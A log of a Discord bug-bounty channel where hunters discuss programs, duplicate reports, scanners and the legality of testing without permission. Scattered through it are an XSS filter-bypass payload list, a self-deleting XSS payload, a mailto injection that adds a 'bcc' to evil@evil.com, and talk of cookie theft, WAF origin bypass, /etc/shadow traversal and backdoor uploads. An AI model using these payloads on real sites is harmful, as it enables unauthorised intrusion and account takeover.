#bug-bounty

Thanks for sharing.

Gave +1 Rep to @tough garnet

Here's the summary ( Twitter thread ) of day 14 of my #100DaysOfHacking challenge

https://twitter.com/NjmUlSqb/status/1482041741670858753?s=20

Does it take longer to respond when the severity of a bug is higher?

I've been waiting more than 3 workdays on a response

of 1-click account takeovers

Depends on the program. You tend to find the higher severity tends to get a faster response

Also depends on whether the program is managed by the client or by the platform

What are your thoughts on using Nessus during a bug hunting session? I mean what if i could just deploy nessus on a VPS, allow it to scan target subdomains provided as a file, wait for one-two days for vulnerability assessment to complete and then exploit it? Is that a feasible idea? Or i am just thinking it all wrong?

There’s nothing stopping you from doing it, but for the most part it won’t find anything

Have you tried it? Mind explaining? :)

@mighty wigeon most companies prior to pushing their web app to production, do required scans in a different environment and have test cases that the code must pass prior to it being pushed. Most bug bounty programs will want you to manually test the site because they assume that the security researcher will be more in-depth about edge cases and things that could break the web app than an automated scan

Here's the summary ( Twitter thread ) of day 15 of my #100DaysOfHacking challenge

https://twitter.com/NjmUlSqb/status/1482406196996943872?s=20

Thanks for this insight. :) I understand now

Gave +1 Rep to @austere geyser

Chances are you’ll never find a bug, hundreds of people rely on tools like Nessus thinking it’ll be easy money. Shocker it’s not. The manual approach is the only real way of making money through bounties or automating stuff yourself

I didn't think of it as the easy money way. I thought that a vuln scanner would give me a competent opinion about existence of a vulnerability. But thanks for providing me this insight. :)

Gave +1 Rep to @native token

Hey any one here to become my partner to learn bug bounty together DM if intrested

Yes...@huehue

@glass ivy what skills you need for a partner??? i am kind of a beginner

if that works for you

Same here we could work as three

I've done pentesting entire bit never bug bounties

What should I know about bug bounties and what is there to study before I do it? Is it different then Pentesting, like if I know some pentesting skills then I do bug bounty, and what is a good site to start on bug bounty? Also will bug bounties help me learn future skills?

@glass ivy i am interested on bugbounty learning, i am complete beginner to it

https://link.medium.com/kZVjeZrbWmb is this legal?

I'd make an educated guess that bruteforcing every single subdomain and endpoint (especially when automated) causes service disturbance

Before starting bug bounty, you need the skills down.
People see dollar signs on big bounties and immediately jump to it. Don't do that.
You need to know what you're doing first, and even then you're not that likely to find anything.
Bug bounty isn't stable income like a job, but it's an OK side gig. You can spend 40hours on an app and find nothing, and as such get nothing. You could find something big but get it closed as a duplicate.

in addition to that, flexes on social media about bug bounty money never include the amount of hours invested into finding a bug

so don't assume people find a 2.000$ bug in an hour; they most likely spent dozens enumerating the website for attack vectors

Plus you don't hear about the small bounties. It's a massive reporting bias.

lmao new account takeover incoming

https://images-ext-1.discordapp.net/external/zDRfAvTMsHh6519u33dHOh4oZKHV13qs62DgSyKfXe8/https/i.imgur.com/uboMNu2.png

found a way to extract cookies using javascript while HTTPOnly was true

as I'm bypassing a 403 on the dev page listing the cookies and other sensitive debug data

only issue is that the XSS requires the <>'s to be unencoded

but firefox auto encodes them

does anyone know a work around? when I don't encode it in firefox it works fine

curl/burp I think, I have no clue though

yeah they both work but I want a work around for browsers

so it's exploitable

using fetch() with content-type: application/x-www-form-urlencoded and a POST method bypasses it

but now you need to find a way to make it execute

maybe look for an extension

also I think a curl poc would be awesome to get

like it has all the relevant info

and is easier to reproduce

it needs to be exploitable from a users POV

so the impact is higher

so I can do a 1-click or even a 0-click account takeover

a command is easier for a 1-click takeover I think

but try chromium based browsers

hm alright

'headless browers' can be used for automating stuff like this but the're seldom used
I tried making a xss fuzzer with one but couldn't fully understand it and gave up, I believe @worthy folio recommended it so he'd know more 🤷‍♂️

not that much more, I'd hook it up to puppeteer or selenium

🙂

Got a response yet?

yup

awarded as high

had to escalate severity twice though

they didn't like the account takeover

you? @stray tapir

No response yet

They fixed the reflected XSS that lead up to it yesterday

oh nice, so they should respond soon

Last time they fixed it the next morning and replied 10 days later

Yeah

oh

right

you can always send a follow up message verifying it's fixed

I HATE MYSELF LMFAOOO

TL;DR: told the account takeover guys to enable WAF

but now all my stacked bugs are rendered useless

shot myself in my foot big time

could've squeezed another two unique account takeovers out of those

Here's the summary ( Twitter thread ) of day 20 of my #100DaysOfHacking challenge

https://twitter.com/NjmUlSqb/status/1484203142690529280?s=20

@stray tapir is the WAF smth like Cloudflare?
You can find origin - either 1) look at old IP fo that domain, or 2) sometimes there are subdomains which leads to the same website, but without CF
For 1) you can still request the files (you set ip & host header to the tools), for 2) you can even reproduce the XSS as user, etc.

Yeah it's CF WAF

I know the pub and priv IP because of the dev page leak

let's see

wth

they deactivated the WAF

wrote a report

sent it

everything has a POC with proof of it working

in before they reactivate waf

Is there any way to bypass imperva?

I reported 5 vulnerabilities all insufficient session expiration . all of them considered duplicate.It sucks

First off, congrats! You found something! Remember a duplicate means you found a vuln, but someone beat you to it. You’re on the right track! This is all part of being a hunter.

With that said, go DEEPER. You come across more dupes when you focus on the easy and common stuff. Things like session expiration don’t always hold a lot of business impact. It’s easy to detect. It’s easy to report. Hence all the duping.

How could you leverage this in your kill chain to do more impactful damage? Is there any app logic bugs that are exasperated because of the way they handle season management? If they already have this sort of vuln what else might they not be handling? There is a good signal to look harder.

As for WAF bypass, check out https://github.com/0xInfection/Awesome-WAF as a starting point. Lots more you can Google on the topic, including specific payloads that could help. HTH.

Good luck! 🎉

Hello

How can I bypass <?php echo "lol"; ?> changing into <!--?php echo "lol"; ?-->?

should be noted that I have XSS and HTML injection on this page

but it's encoded as JSON hence I can't use "

because it gets changed to \"

looks like it only does it when it detects <?

<.?php echo "hi"; ?> doesn't get changed

Blacklist Bypasses
If some kind of blacklist is being used you could try to bypass it with some silly tricks:

//Random capitalization
<script> --> <ScrIpT>
<img --> <ImG

//Double tag, in case just the first match is removed
<script><script>
<scr<script>ipt>
<SCRscriptIPT>alert(1)</SCRscriptIPT>

//You can substitude the space to separate attributes for:
/
/*%00/
/%00*/
%2F
%0D
%0C
%0A
%09

//Unexpected parent tags
<svg><x><script>alert('1'&#41</x>

//Unexpected weird attributes
<script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script      ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>

//Not closing tag, ending with " <" or " //"
<iframe SRC="javascript:alert('XSS');" <
<iframe SRC="javascript:alert('XSS');" //

//Extra open
<<script>alert("XSS");//<</script>

//Just weird an unexpected, use your imagination
<</script/script><script>
<input type=image src onerror="prompt(1)">

//Using `` instead of parenthesis
onerror=alert`1`

//Use more than one
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //

hm

<?<?php echo 1 ?> changes into <!--?<?php echo 1 ?-->

should I be expecting PHP execution at this point?

I was thinking <--><?php echo 1;><!--> but wasn't sure tbh

that changes into ```html
"...": "<-->
<!--?php echo 1;-->
<!--"}-->

https://i.imgur.com/MA2LfUv.png

hm

how does that even work

or is this a firefox thing

okay that's a firefox thing

bruh?

ig that this isn't vulnerable

@swift grotto Thank you:)

Gave +1 Rep to @swift grotto

i hpe it's useful for new entry

https://github.com/0xJin/awesome-bugbounty-builder

Is it possible to get stored XSS when you can't add anything to the page aside from params?

You tell us. Are the parameters you pass being stored somehow?

can Anyone help me please,I need IDOR scenarios?

Check console.log by inspecting also pay attention CSP blocks or not

hey guys i have a question. what is the vulnerability type of "wp-content/debug.log"

can anyone help with this!!!

Account data web requests

account_id = 431 to account_id = 432 etc

perhaps even authentication bypass using cookies

Thank you 🤩

thank you

quick question: Google single sign on not allowing me intercept,how can bypass it on chromium?

man

I found the new OWASP Juiceshop

It's called OWASP juiceshop prod edition™️

https://i.imgur.com/d18dIWf.png

found a way to get unlimited stored XSS's on a website

unfiltered and everything

and available on every webpage

I truly, truly, truly wish the developers are going to get their pay checks decreased by these bounty payouts

because what they wrote is coming straight out of PHP hell

oh, and it's causing a client side DOS

Pretty sure you're not supposed to be disclosing this publicly smh

Especially with the GIF that you posted before

wait y'all got logs in the staff channels?

What do you think smh

:pepemonkas:

We also watch like hawks.

https://c.tenor.com/O6p5BPzBQ4UAAAAM/eagle-peek.gif

🐦

What have you guys got on me 😄

If anything?

Heyo all

Hello everyone, I have a question in my mind and I would be very happy if you can help. When I join a program on Hackerone, I download the BurpSuite config file of that program and add it to my project. When I visit a website within the scope of the program, the web address gives a 302 response and directs me to another address. I can't see any data in my HTTP history because the address I was directed to is not in the destination addresses in the BurpSuite config file. Do I need to add this forwarded address to the destination addresses in BurpSuite? For example: The domain address in Periscope is "https://google.com/" and I added this address to my BurpSuite target filter. But when I visit this address I am redirected to "https://www.google.com/" and my BurpSuite historical data is empty

thanks mate!

Gave +1 Rep to @old umbra

Hi everyone,quick question: If you are able to disable your account 2 factor authentication or adding transactions or deleting them through burp repeater ,is this considered a vulnerability?I dont mean another account .I mean your account.

thank your in advance

Can you do it through UI ?

welp I just reported the XSS bug to OWASP Juiceshop 2.0

issue is, I lost the payload I used in that image

I'd love to use an anime kms emote here but afaik I'll get muted :'(

Made a pretty funny XSS payload while testing it

'"><script>var+s=document.getElementsByTagName('script');var+e=s[s.length-1];console.log('Invisible+XSS+:poof:');e.parentNode.removeChild(e)</script><?

basically prints 'Invisible XSS :poof:' to the console and delete's the payload

en disguises the inline garbage from html using <?

What is UI?

Does anyone know how to get an email from instagram , I tried Osintgram but didnt find any thing useful

Did you try to find out before asking?

yes

Then you know it's User Interface, so in this case a rendered website.

Is it me or is bug bounty a bad name for bug bounties?

By saying bug you're saying they're paying for regular bugs like unintended behaviour in software

while it's more commonly security vulns

So I was digging into some spam emails and I think I found a way that the senders were able to bypass Gmail's spam filtering. Is this something that their Bug Hunters program would be interested in? There's a section on "abuse-related methodologies" but that seems to be focused on review manipulation. Does bypassing filters count as abuse?

Depends on how they did it, and if you can replicate it

Fair enough. It involved sending data in the body that was parsed by the filter but isn't being rendered by the client. Replicating should be doable but I haven't started on that yet

Hello, "x[dot]com", which is given a single domain as a scope in a program, redirects me to "aaa[dot]x[dot]com" when I go to this address. Can I add this forwarded address to BurpSuite target addresses? Because otherwise there is no data on BurpSuite. How should I do something?

directory traversal on web application, I am able to retrieve the /etc/passwd file, but not the /etc/shadow file from the webserver syntax I am using: =../../../etc/shadow any ideas why this might be happening?

Because/etc/passwd is world-readable whereas /etc/shadow isn't

The user running the web server (e.g. apache, www-data) doesn't have access to it

Okay, thanks. I am logged in as admin and have uploaded a php-backdoor, there is a file restriction in place will only accept HTML files, so I changed the file from .php to .html but I can't interact with the back door in order to ls for the directories. Do you know of a work around to get root on the file system?

Gave +1 Rep to @dusty pasture

First you gotta get RCE, then any privesc😅

Try different file extensions supported by the web server (check response headers and error responses to know what server it is)
Like .php, .phtml, .inc

How do you have directory traversal and file inclusion?
Try source code disclosure for the .php file that you performed the upload on to figure out any bugs

It's apache 2.4.29 ubuntu. Nmap scan shows smb 445 as filtered, ssh is only accessible by private key so I can't brute force the creds with hydra. Not much to go on. Thanks for your help will keep researching as I go. Cheers

Gave +1 Rep to @dusty pasture

If there would be some platform where you can learn privilege escalation... 🤔

And bypassing file upload restriction...

Use tryhackme and Portswigger academy @peak wharf There's also a course by Tib3rius for learning privilege escalation. There's github repos containing scripts which are used to setup an environment for you to learn different privilege escalation techniques

What's tryhackme?

Ur trolling right? 😂

It's more a sarcasm than trolling.

Understood sir. :)

Hi. I’m getting started in bug bounties and I am currently doing the NahamStore exercise and I am stuck on Task 2. Can anyone help me please

Welp now that im sick lets see how many "sorry but this is a duplicate vulnerability" messages I can get within the next 5 days

Hey everyone I have a question in my mind and it's really helpful if the pro bugbounty hunters answer it. I started and currently it's the second year as a Cybersecurity student and practisioner. I came to know about bug bounty about the long ago but never thought to actually do it myself. But last I got a keen interest in them I actually started learning from books, medium etc. But TBH I can focus in everything like I have to do thm, htb , portswigger , hacker 101 etch every single day. If any of the pro's find out the flaw and how it can be fixed . I think I should only do thm until I complete real-world bug hunting like if I do these two per day I think I would focus more on both.

I've never done a bug bounty but i've started looking at them. Question. Does this mean any vulns found on exploit-db,metasploit,published CVE's, etc are out of scope?

No that means if you can exploit it, you will be required to attach a proof of concept

That's basically saying, don't waste their time saying "You're running an outdated software package that's vulnerable to x" without having proof that it's vulnerable in the form of a working poc

I am just getting started in bug bounties and I’m wanting to find a mentor to help me gain more knowledge with bounties and provide some structure to learning about vulnerabilities and such. Is there anyone who would be willing to mentor me?

Tbh, ppl are busy and there are slim chances you might find one. I suggest you check the pinned messages on this channel for more resources.

Ok thank you

Gave +1 Rep to @celest vigil

No way

Hello everybody!!! I am a newbie in this field. Earlier I was in medical stream but had interest in coding and hacking stuffs, so I finally decided to switch careers. I have completed 12th and have a basic level of knowledge about computers like not that much technical but a pro level in normal user community 😅 . I have seen some of the youtube videos and from that I know what things I should learn but I didn't know where to start. Is there anybody who can personally suggest me what I should and where should I start and help me whenever I get stuck in something like a mentor??? I have heard from every youtuber that this cyber community is very helpful and people always always help each other to whatever extent they can and you can easily find a mentor. So looking forward for help😇 Also I am not that type of guy who keeps you spamming all the day. I will just ask my doubts whenever I face any problem. So if somebody is there who can be my mentor, I will be delighted.😇

Everyone is a mentor and a helper over here. Everyone can reply according to their own convenience

You just need to start learning and hacking!! Plenty of resources available but if you get overwhelmed, just ask anyone in this or #resources channel @solar perch

Just got 100 euro's (~110 usd or so) for 7x reflected XSS and 2x reflected self stored sidewide XSS which all lead to 1-click account takeovers, off program

got the same for two reflected XSS bugs at the same company earlier without acc takeovers, so I'm kind of feeling scammed but aye I'm happy with it

probably atleast 15 hours sank into it so I'm pretty happy

Thats great man!

Congrats man share some tips

Find PHP sites without a CMS

100€ for all these bugs is a scam.

Well like I said, it was off program and took a bit of a risk

I'm happy I'm not getting sued lmao

oh ok nice

😛

So why were you attacking it

I asked it before hand

Noticed the site was spewing out user content and not filtering <>'s

And got a full, legal scoping document drawn up, I assume?

There's a reason pentesters don't do odd jobs -- it's the legal equivalent of balancing on one foot at the edge of a cliff with a black forest gateau in a hemispherical bowl on your head.

Be very glad you weren't sued, or charged by your local authorities for breach of whatever hacking laws you have locally. Verbal consent is not good enough for things like this, which is why pentests have strict documentation for it. An out-of-programme bounty hunter is in exactly the same boat.

Don't be a cowboy -- it gives everyone else a bad name

Ahh alright

Didn't think it would be interpreted like that because I'm just sending in a report without asking anything for it

Just thought of it as free security advice on a website and no other systems

When in reality it's you attacking a public-facing resource with no formal consent or authorisation, which is in breach of pretty much any hacking law on the planet. It's the kind of thing people do jail time for 🤷‍♂️

"Free security advice" is a nice sentiment, but you're totally at the mercy of the owners of the website. If they decide to call the police, you have no legal protection. You can, and usually will, be criminally prosecuted for it.

It's the equivalent of breaking into someone's house then, when the police show up, claiming that you were only doing it to show them that their security is bad (then asking to be paid for doing it)

Hm I hadn't thought of it like that, yet

So I just should just stick to RD / official bug bounty programmes?

i once did this too

made a file about all vulns

was thinking about emailing them with POC but....

Isn't it worse when you don't report those vulns?

or do just you hope they don't identify you

only if you publizie it and do malisious scanning burp modifications etc

or use known exploits

i think muiri knows better

Anything that has an official, scoped, bug bounty programme is fine (as long as you stay inside the scope). The fact that they have defined the scope and given a blanket permission gives you some legal protection, although even then it isn't unheard of to still be sued for it (which is why the big bounty hunting sites exist -- to act as a buffer and protect bounty hunters)

Basically. Once you've exploited a vulnerability you've committed a crime. You can tell them responsibly and hope they let you off, or not tell them at all and hope they don't notice, but either way it's criminal 🤷‍♂️

I suspect if you stumbled across something legitimately then you would be fine though. For example, searching a user database for someone called O'Hara and getting a MySQL error back (e.g. SQLi) is a totally legitimate use for the application and just allowed you to stumble across the flaw. Bit difficult to sue for that if you weren't acting maliciously or otherwise hunting for bugs.

Going outside of scope is illegal.

Bug Bounty is legal when you stay in scope, because you have permission from the site etc

It's mentioned below the programs on the bug hunting platform you choose the program from

Gave +1 Rep to @mighty wigeon

It doesn’t have to be a bug bounty program. As long as they have a documented vulnerability disclosure policy that clearly describes scope and/or safe harbor. Ensure the company holds you harmless against reasonable assessment. No VDP/BBP, don’t touch it.

Sorry @hybrid orchid that was for @stray tapir . I know you know this stuff.

Also if you'll find any personal information of any user they will be forced to report it as a 'data breach'

Has someone attempted to automate shodan recon like we can automate Github recon using gitgraber and slackcat? I am just interested to know if shodan recon automation is a possibility..

It has an API and a command line, it's certainly possible to automate it

If it’s done, I’ll do a good writeup

anyone have the link for a really good cve list platform?

Mitre exists?

An url parameter payload gives cloudflare 520 unknown error code. Any clue???

is the report from BurpSuite enough to make a report? asking for a friend

most of the infosec blogs counts automated bug scanners as bug bounty tools, my question is that do automated scanners really help in finding bugs on web?

i mean tools like zap wapiti burp suite scanner ...

No it isn't, you need to be able to demonstrate impact beyond "BurpSuite produced this alert saying webapp x is vulnerable to y"

They can certainly help but the best scanners are custom made to include vulnerabilities that common scans don't detect

yeah right! thanks

Gave +1 Rep to @native token

Thanks. Yes of course i have to demonstrate but the way BurpSuite reports is standard right, coz i am lazy

Gave +1 Rep to @native token

Don't be surprised if you end up having to re-write your entire report. Being lazy doesn't exactly get you anywhere

Or get a fail for plagiarism.

Happened to someone in my class 😂

happened many times lol

Im not sure if this is the right place to ask, but still, I found a bug that I'm 99% sure has no security issues (instagram), where should I report it?

@native token

skorta

l

SRT waitlist takes < month at most

Smart people would find an existing member to refer them to bypass it 😂😂

https://tenor.com/view/feel-me-think-about-it-meme-gif-7715402

Hello bro plz refer me sir

Hi guys I have question

Regarding a bug 🐞

I new to the bug bounty so i am confused wether to report it or not

Which

403 bypass

When i send GET request in response I am getting 403 response code

But When i change GET method to OPTIONS method it is showing 200 response code

But when I am opening response in browser it just showing black page.

OPTIONS will just return the possible request types, similar to how HEAD requests can be used to bypass 403

Unless you can exfil any sort of data from it, chances are it won't be accepted

I think it could be

😄

ay 👋

o/ 😄

Joined THM to study a few things

OPTIONS is just the preflight request, you most likely won't be able to exfiltrate data from it.

It always depends on the content it finds inside

anyway, i sent my request to synack and they said that i'm eligible but i'm currently in waiting list.. This one month ago, i need to wait so much ?@native token (sorry for ping)

Chances are a 200 with a blank page isn't gunna pay out, that's a low at best, informational on all else

What are the good tools for web scanning other than Burp, ZAP, Nikto, Nessus, and hakrwaler.

netsparker

more worth command line 😛

If you're doing bug bounty, there isn't a good web scanner

There was a guy, that found so much xss with this scanner

I had good scanner, but he asked for a salary rise, and I let him go. 😦

Anyway, I had an idea just recently. What if you are a programmer, you know about CSRF. So you check to which IP the domain resolve, you either block it, or allow. And if it's ok, you send it further to the application, where it gets resolved again,but this time with different IP.
And that was kids how I re-invented DNS rebinding 😮
Question: What will I invent next week?

Another bypass would be of course redirect to internal ip range / domain pointing to internal range. Or even simple <meta> / JS redirect in case of rendered HTML page, but then you would probably have other interesting stuff to do.

https://youtu.be/YU4QBjg703U

if we pentest in company unpatched bug bounty, and we find a bug, do we still get paid?

In pentest you are paid for the pentest process itself, not found bugs.

There might be a pentest contract addition for actual findings, but that isn't a concern of the pentester; that's more of a contract negotiation thing.

@analog glen as an extra rewards, or getting paid only if something is found?

as a bonus. Pentest on a contract is always going to be that contract base pay.

#cyber-and-careers if you have further questions 🙂

hello

guys

me and my friend need some people for the CTF teams

so anyone in?

please DM

This channel isn't for looking for CTF teams

Hi everyone! Is there chance of any type of injection XSS, command, etc if I can dynamically place some strings between mailto:'' ?
Actually mailto:'{handle}' is being dynamically loaded so can I place some malicious string in handle
I tried mailto:'n@n.com;alert(1)' but the whole string ends up in the TO section of default mail handler

Do you have to be a fully skilled computer programmer or at have some skill at computer programming to be a bug hunter?

epic.. xD

I think is not necessary.. You must be good to read various programming lang..

There are various techniques to do this, automation for example .. Many people manage to find many bugs only thanks to automation .. Without going to find manually. It depends. The more general concept, however, is to know as many web level attacks as possible, auth, various bypasses, etc

Study the application well. Understanding the mechanisms of the application in front of you, how it is structured, the times it has to do certain things.

Know at least very well the most frequent attacks, xss, csrf, sqli.

I think one of the best courses is OSWA, I'm studying it right now.

@old umbra please don't post black or greyhat hacking. You might think it's morally justified to hack scammers but it is still illegal and therefore not tolerated here.

sorry :S

Watch some videos from NahamSec, he's asking this question every guest. And most of the time, the answer is ||how about you watch it, if you are interested in this field?||

it.is@unsecured.company?subject=possible

But I guess you need to check what is actually escaped, etc. It seems you don't end the ' there, at least.

Also, if it's done in some frontend rendering e.g. React/Angular and so, it might be not executed.
Very generic question without example 🙂
It's probably better if you invite someone to collab with you.

This seems to be only possible issue, ability to add BCC

Yes, its an angular app, forget about this on, if I get some javascript:alert(1) placed in location.href will it be executed?

I don't know, did you try it?

BCC?

I am finding the entry point 😛

Actually, if you add something like mailto:'victim@victim.com?bcc=evil@evil.com' blind carbon copy will be sent to bcc address

You willing for collab? 😛

hmmm, never though about that 🤔 will need to try it somewhere. nice.

Gave +1 Rep to @civic umbra

thanks, but I'm busy. 🙂

bcc is a vuln?

if they never implement it?

Think about the CIA triad.
If you can get a copy of each email sent without the recipient knowing, that's a confidentiality issue.

I thought it too, but I also thought it was possible for some company to use it.

Yes, but this case is possible injection of a bcc

Do you think is possible medium or high as vuln?

Do those include the people that get paid thousands of dollars for finding bugs for large corporations and who enter those hacking competitions

I'm not a bug bounty hunter ¯\_(ツ)_/¯

Is there any specific name for convention of writing JS like javascript:alert(1) with colon?

I am trying to study this in depth to see what sort of payloads can be made with it

some help for dom xss ?

thanks in advance ❤️

I expect these guys will be asking how I can learn programming instead of do I have to.

they should. programming is awesome

So, what was your question? 😄

https://twitter.com/alexbindrei/status/1492183778252439553?s=21

I wanna cry

Omg, chicken nugets. Envy, bro.

Voooodkaa

I got a CVE-2021-43798 on a Grafana instance on Google Cloud. But the problem is that it's belonging to a Google Cloud Customer. So i reported it to Google Cloud Compliance. Any chance it will be considered valid?

d

i

nope

ck

Do y'all do manual testing on CMS sites like Wordpress and Drupal? I've never found any exploits / bugs that weren't listed by wpscan and droopescan

I don't think many CMS sites would inject their own insecure PHP code

You'd be surprised. Developers are humans. Humans make mistakes.

If you are getting serious of hunting bounties on popular CMS consider looking through diffs between versions and look for the newest / latest code being introduced. See what they are "fixing" or "adding", and see how it impacts other things. Look for patterns; devs are creatures of habit, and if they are fixing one vuln somewhere, the class of vuln may exist elsewhere in the codebase. I got a couple of larger bounties in one web app because devs had cut/paste code segments.... fixing it in one spot but not others. The logic bug allowed me to use that in an more complex kill chain that got me a critical because of it. Don't fret about the low hanging stuff wpscan etc can find. Look at the actual code base holistically. You'd be surprised what you find.

I was originally talking about the websites running the CMS instead of the CMS itself, but that's some solid advice, I'll check it out

tbh if you're testing a website running a CMS the best approach is to find out version and download the source if it's available

I feel bugcrowd responders use double standards.I reported an issue they marked as not applicable and said how attackers would find the user’s token.
I work as an app security engineer and validate submissions from bugcrowd, and their bugcrowd responders never ask this question. They usually create a blocker.
I just wanted to know. Sometimes they act as if were are owed them.

Hmmm, thats wierd

in those cases, it should be at least closed as informative

Bug bounty

Sounds like fun times ahead

Yep

I love doing it

Yeah they are hypocritical

https://www.bugcrowd.com/about/contact/

Someone is going to create a blocker after they read your email

Or you can go for an appeal

let me rephrase that: Another ASE is going to look at your report and may create a blocker or validate it.

As I said I also validate submissions internally, everyday I see how bugcrowd researcher works

Welcome to the world of bug bounty-

If you can't demonstrate how an attacker could exploit something every step of the way. Including obtaining that users token. You aren't getting anywhere

Complaining about it in a discord completely unrelated to bugcrowd isn't going to help you at any point, regardless as to whether you verify submissions internally or not

**** FINALLY GOT MY FIRST REPORT RESOLVED ****
I am happy to announce that first report has been closed as resolved which is a high severity finding.
Here's the summary ( Twitter thread ) of day 46 of my #100DaysOfHacking challenge
https://twitter.com/NjmUlSqb/status/1493599291763564546?s=20&t=hRV_Oh1ggYAzxESoUgTiaA

Noice

You might be right however I have seen bugcrowd team dont ask bug hunters how attacker would find another user’s token when IDOR vulnerability comes they just validate.I know what I am talking and seeing this everyday

Did they ask you how did you find victim’s token ?

Then refer to my second point- moaning in here won't do anything.
As someone who frequently deals with hackerone, bugcrowd and SRT the common point for all platforms is you have to prove impact and exploitability.

Blindly saying "Acquire user token" doesn't fly and I've had reports rejected for that.
Take a step back, find a way of obtaining a user token and try again

Reporting without a method of acquiring a token is a roulette wheel, no different to xmlrpc submissions

You moaning here not me .I am saying my opinion on it and I am right.

I found token in local storage,User token leaked in local storage.

Your user token or another user?

How you test Idor ?You need two account.

Starting to think you're fire drago on an alt

Attacker and victim (User A and B)

I don’t understand your urban words and at the same time it is not funny. I found Idor and added my Proof of concept ,a bugcrowd team member without checking details or creating a blocker he marked as not applicable.

@native token

What?

What do you want?

Or are your intensions that of being annoying?

No sorry2 i just try the emoji

Sorry my fault... 🙏

Yea not quite seeing the reason for a ping

Was Fire drago banned or something?

Nah he was just delusional

😂 I see.

No.

They marked my report as not applicable because of these token

I have been hunting for past 46 days continuously as I am having a #100DaysOfHacking challenge. I got my first bounty today for a high severity bug. It feels so good.
Follow me on this hacking journey as I share my progress daily on twitter
https://twitter.com/NjmUlSqb/status/1493599291763564546?s=20&t=hRV_Oh1ggYAzxESoUgTiaA

Tokens usually have high entropy. So yeah that was on cards

mine leaked in local storage of browser

waiting an answer

on cards?

lmao unless you can find another way of obtaining the token other than access to a users device to extract from local storage, you're really stretching

How hard is it to start hunting?

I’m in high school and thought it would be a fun side job

Eh, I don't think you can really call it a job.

You can but it’s going to be hard to get to that point. There are “professional bug hunters” who work for large companies and get paid to find bugs, as well as for the bugs they find. It’s just not easy to get there

By paid I mean hourly

It would be easy if there would be less/no competition

You can focus on less focused on assets/targets

I have seen some pretty cool bugs on the games side

Doing bug bounties at high school isnt that bad? I think that is when you are around 16

I think you should give it a go if your focus isn't getting money / feeding your self

Bug bounties are risky for people that are required to make X monthly from it. But if you are a highschool student that has about 0 expenses messing with BB isn't that bad

HI

yo

Hey, I'm wondering how bug bounties actually work. What is stopping a company from reading your report, fixing the bug, then not acknowledge your work?

I've seen some people say it does happen.

I think it's harder for companies to do that if you use a bug bounty platform?

Not much. Trust/reputation really. Not much else.

Having the bug bounty platform there makes it better, the platform has a bit more weight in arguing

Ahh I understand, thanks for the info!

When I tried BB for first time, got few "no impact" responses, but of course it got fixed :))
Which, yeah, I understand, does not necessary goes against each other.

@fallen palm

can someone confirm what exactly below regex indicates

(REGEXP_CONTAINS(path, r'(\/(?i)siteba[a-z0-9A-Z]+\.zip|^siteba[a-z0-9A-Z]+\.zip)'))

I understand this part siteba[a-z0-9A-Z]+\.zip but don't know why is it written twice
We are looking for some missing alphabets in - siteba<missing alphabets here>.zip

I believe the first one using \/(?i) escapes / in front of "siteba" and turns on case insensitivity, while the second one is saying the beginning of the line must match "siteba..."

@fringe sandal you can also check it on https://regex101.com/

thanks a lot for this explanation!

Gave +1 Rep to @zinc vale

thanks for sharing, it's seems to be really useful.

-ban @dull eagle -ddays 1 Immediately inappropriate and trolling.

🔨 Banned Business Zeus#0999 indefinitely

Hello Everyone,
I have made a automated Recon web application where anyone can deploy it on heroku for free and it is purely designed to be hosted on heroku since heroku is a free hosting platform it's a free alternative for VPS

https://github.com/gokulapap/Reconator

This is absolutely crazy, how long did it take?

Thank you 😇

Gave +1 Rep to @opal meteor

It took 4 months to complete

Share max if you like it ✌️

I'm defo using it and I just starred it on github haha

I'll see how well it works and if it's as awesome as it looks I will really recommend it haha

✌️👍

Yo I have a couple of questions regarding this tool, may I DM you?

Static analysis
Data is read from document.cookie and passed to the 'innerHTML' property of a DOM element via the following statements:

var results = document.cookie.match('(^|;)\x20?' + a_cookie_name + '='+r4c+'(;|$)');

return (decodeURIComponent(results[2]));

var display_session = get_cookie("LastMRH_Session");

document.getElementById("sessionDIV").innerHTML = '<BR>The session reference number: &nbsp;' + display_session + '<BR><BR>';

how to exploit this dom xss

Think what’s user controllable, and then think how you could get that data to the statements. And then think if there’s a way to exploit that.

Yes sure anytime

Thanks!

Gave +1 Rep to @marble tapir

can someone provide the code for the file needed to create malicious packages in java and ruby(dependency confusion)?

Do a google search = dependency confusion github

They're all on npm or pip.

Anyone know how exploit or find sql injection via parameter ?not login page .

A lot of people know how to identify and exploit that. The real question is, do you know how to do that?

Head over to portswigger academy and educate on it, it'll make sense and sink in

SQLI is very well documented

Exactly, also there is a roadmap and everything is for free. And, SQLi vulnarability is in fact in the 1st place of roadmap. Great resource.

Hey guys, I switched an POST parameter(in the below error message, the POST parameter I changed is called messages) from a string to an array, and got this error
javax.ws.rs.ProcessingException: RESTEASY008200: JSON Binding deserialization error: javax.json.bind.JsonbException: Unable to deserialize property 'messages' because of: Can't deserialize JSON array into: class java.lang.String
Any ideas what more I can try next?

@fluid hare This channel is for bug bounty...

@native token 👍

Hello guys anybody to help with PDFs please

if thats not wanted just delete it, but i guess its the right place https://hackenproof.com/ukraine-will-win/call-for-ukrainian-cyber-defense-stop-the-war

@young spoke Where does hacktivism come on THM ruling? Ignore, thought it was the hack Russia one again- Turns out this one looks legit for Ukraine defence

me smooth brain this morning

This was brought up in General a few days ago, I pinged James just in case.

All good, I read it the same way too haha

but ftr the ruling is that we don't condone it and people should be aware of the legal implications of doing stuff like that (i mean esp. if you're going after a state power currently at war) so we try to keep it out of here as best as possible (:

Can't really be seen as a recruiting grounds but we don't go mental about handling it

Please guys, where can I get a well paying job in cyber security or do bugbounty well

GOOGLE

Not helping!

Buddy all the resources are available and are just a simple Google search away.. Follow Rachel Bicknell on Linkedin, she posts about jobs and internships. Use Linkedin more! Resources are available freely everywhere

Hi everybody, I’m new here!
I’m a software engineer transitioning to cybersecurity, I know about sql inj, XSS and other basic exploits, I’m looking to start with big bounties, but how do you get over the slump of the first times when you cannot find any vuln in the apps you’re testing?
I feel like I’ll never be able to complete bounties

Tryharder mindset😁

realistically how much skill/knowledge/experience is required to be successful at bug bounty’s?

@alpine robin 😆 true, it’s the feeling that I have not been a noob at something IT for so long, that not being able to do it feels overwhelming haha

This is wherw u can Buy dhc 🤨?

Where *

yo

im new here so wt to do here?

This channel is for bug bounty specifically, you can read through #start-here if you want to understand the discord and what it's for.

K

Tq

Yes

EXPLAIN

